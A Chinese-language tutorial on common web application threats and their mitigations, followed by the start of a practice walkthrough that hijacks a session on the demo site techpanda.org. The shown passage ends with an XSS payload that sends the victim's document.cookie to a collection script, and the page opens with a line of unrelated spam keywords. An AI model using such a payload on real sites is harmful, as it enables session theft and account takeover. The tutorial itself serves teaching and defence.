国产成人网,久精品在线,婷婷综合激情

提到網絡攻擊首先我們看看兩個問題。什么是網絡應用程序?什么是網絡威脅?

Web應用程序(aka網站)是基于客戶端 - 服務器模型的應用程序。服務器提供數據庫訪問和業務邏輯。它托管在Web服務器上。客戶端應用程序在客戶端Web瀏覽器上運行。Web應用程序通常用Java，C#和VB.Net，PHP，ColdFusion標記語言等語言編寫.Web應用程序中使用的數據庫引擎包括MySQL，MS SQL Server，PostgreSQL，SQLite等。

大多數Web應用程序都托管在可通過Internet訪問的公共服務器上。這使得它們易于訪問，因此容易受到攻擊。以下是常見的Web應用程序威脅。

SQL注入 - 此威脅的目標可能是繞過登錄算法，破壞數據等。人話：走后門
拒絕服務攻擊 - 此威脅的目標可能是拒絕合法用戶訪問資源。人話:堵門
跨站點腳本XSS - 此威脅的目標可能是注入可在客戶端瀏覽器上執行的代碼。
Cookie /會話中毒 - 此威脅的目標是通過攻擊者修改Cookie /會話數據以獲取未經授權的訪問權限。
表格篡改 - 此威脅的目標是修改表單數據，例如電子商務應用程序中的價格，以便攻擊者可以以較低的價格獲得物品。
代碼注入 - 此威脅的目標是注入可在服務器上執行的PHP，Python等代碼。代碼可以安裝后門，泄露敏感信息等。
破壞 - 此威脅的目標是修改網站上顯示的頁面，并將所有頁面請求重定向到包含攻擊者消息的單個頁面。

接下來我們該如何保護您的網站免受黑客攻擊?

組織可以采用以下策略來保護自己免受Web服務器攻擊。

SQL注入 - 在將用戶參數提交到數據庫進行處理之前清理和驗證用戶參數有助于降低通過SQL注入攻擊的可能性。MS SQL Server，MySQL等數據庫引擎支持參數和預處理語句。它們比傳統的SQL語句更安全
拒絕服務攻擊 -如果攻擊是簡單的DoS，則可以使用防火墻從可疑IP地址中刪除流量。正確配置網絡和入侵檢測系統還有助于降低DoS攻擊成功的可能性。
跨站點腳本 -驗證和清理標頭，通過URL傳遞的參數，表單參數和隱藏值可以幫助減少XSS攻擊。
Cookie /會話中毒 - 可以通過加密Cookie的內容，在一段時間后將Cookie超時，將Cookie與用于創建Cookie的客戶端IP地址相關聯來防止這種情況。
表單回火 -這可以通過在處理之前驗證和驗證用戶輸入來防止。
代碼注入 -可以通過將所有參數視為數據而不是可執行代碼來防止這種情況。可以使用清理和驗證來實現此目的。
破壞 -一個好的Web應用程序開發安全策略應該確保它密封常用的漏洞來訪問Web服務器。在開發Web應用程序時，這可以是操作系統，Web服務器軟件和最佳安全實踐的正確配置。

最后我們來破解網站

我們將劫持位于www.techpanda.org的Web應用程序的用戶會話。我們將使用跨站點腳本來讀取cookie會話ID，然后使用它來模擬合法的用戶會話。

假設是攻擊者可以訪問Web應用程序，并且他想劫持使用相同應用程序的其他用戶的會話。假設攻擊者的訪問帳戶是有限的，攻擊的目標可能是獲取對Web應用程序的管理員訪問權限。

入門

打開http://www.techpanda.org/
出于實踐目的，強烈建議使用SQL注入獲取訪問權限。
登錄電子郵件是admin@google.com，密碼是Password2010
如果您已成功登錄，那么您將獲得以下儀表板
單擊“添加新聯系人”
輸入以下作為名字
1. <a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">小莫</a>